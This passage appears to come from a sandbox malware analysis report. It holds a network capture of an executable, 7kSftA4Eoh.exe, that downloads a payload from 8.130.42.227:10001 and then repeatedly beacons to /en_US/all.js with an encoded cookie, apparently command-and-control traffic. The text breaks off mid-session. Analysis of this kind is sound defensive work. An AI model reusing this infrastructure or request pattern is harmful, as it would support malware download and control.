                                                                Oct 1, 2024 09:20:09.311163902 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.315973997 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271895885 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271919966 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271995068 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.271995068 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.272136927 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.276880980 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.387017965 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.391904116 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.395035028 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.395035028 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.399781942 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341918945 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341950893 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341983080 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.342025042 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.342158079 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.347110033 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.446712017 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.451651096 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.451711893 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.451873064 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.456873894 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189773083 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189790964 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189799070 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189832926 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.189853907 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.189862013 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189945936 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.190032959 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.190267086 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.190309048 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.194823980 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.305838108 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.311408997 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.311480045 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.311741114 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.316529989 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.260688066 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.260705948 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.262970924 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.263323069 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.268138885 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.370795012 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.375701904 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.375816107 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.376152992 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.380965948 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316540956 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316608906 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.316695929 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316751957 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.431149960 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.431533098 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.436069012 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.436342955 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.436404943 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.436541080 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.441385984 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386439085 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386522055 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386558056 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.386657953 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.387260914 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.391973019 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.494899988 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.500097036 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.503771067 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.508677959 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.513549089 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480326891 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480350971 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480377913 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.480420113 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.480540991 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.485311985 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.587330103 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.592261076 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.592402935 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.592514038 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.597457886 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.552865982 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.553081036 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.554730892 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.554842949 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.559546947 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.667119980 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.672065020 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.674936056 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.675146103 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.680094957 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621520042 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621536970 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621581078 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.621625900 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.621716022 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.626662016 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.727452040 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.732328892 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.732408047 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.732541084 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.737292051 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232091904 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232158899 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.232177973 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232239962 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.233416080 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.239135981 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.342607975 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.347461939 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.347536087 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.347673893 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.352389097 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.302875996 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.302896023 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.303033113 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.303251982 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.308039904 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.414669037 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.419564962 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.419672012 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.422744036 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.427520990 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376581907 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376625061 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376703978 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.377223969 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.382055044 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.525474072 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.530338049 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.530402899 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.537033081 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.541837931 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495697021 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495714903 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495820999 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.495928049 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.500735998 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.602195024 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.607132912 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.607256889 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.607516050 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.612250090 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565737963 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565769911 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565804958 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.565840960 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.565965891 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.570672989 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.680414915 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.685451984 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.685534954 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.685694933 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.690689087 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.658602953 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.592293024 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.592443943 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.597209930 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539206982 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539222956 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539468050 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.539468050 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.544347048 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.652718067 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.657535076 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.660924911 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.660924911 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.665770054 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608714104 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608764887 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608844042 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.610126019 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.614833117 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.728813887 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.733604908 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.733663082 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.733863115 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.739005089 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694813013 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694859982 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694909096 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.694951057 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.695050001 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.699815989 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.805023909 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.809825897 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.809911966 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.812725067 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.817611933 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773719072 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773785114 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:01.773866892 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773905993 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:02.040728092 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:02.046310902 CEST10001499408.130.42.227192.168.2.4
                                                                • 8.130.42.227:10001
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.4 | 49730 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:16:57.838449955 CEST | 187 | OUT | GET /2yMe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:16:58.781096935 CEST | 119 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:16:58 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 277063


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.4 | 49731 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:16:59.805041075 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:00.947107077 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.4 | 49732 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:01.261580944 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:02.228874922 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.4 | 49733 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:02.339623928 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:03.309341908 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:03 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.4 | 49734 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:03.417782068 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:04.365963936 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.4 | 49735 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:04.561846972 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:05.519514084 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.4 | 49736 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:05.636363983 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:06.606287003 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.4 | 49737 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:06.714562893 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:07.666435957 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:07 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.4 | 49738 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:07.777250051 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:08.719686985 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.4 | 49739 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:08.840127945 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:09.789865971 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.4 | 49740 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:09.902760983 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
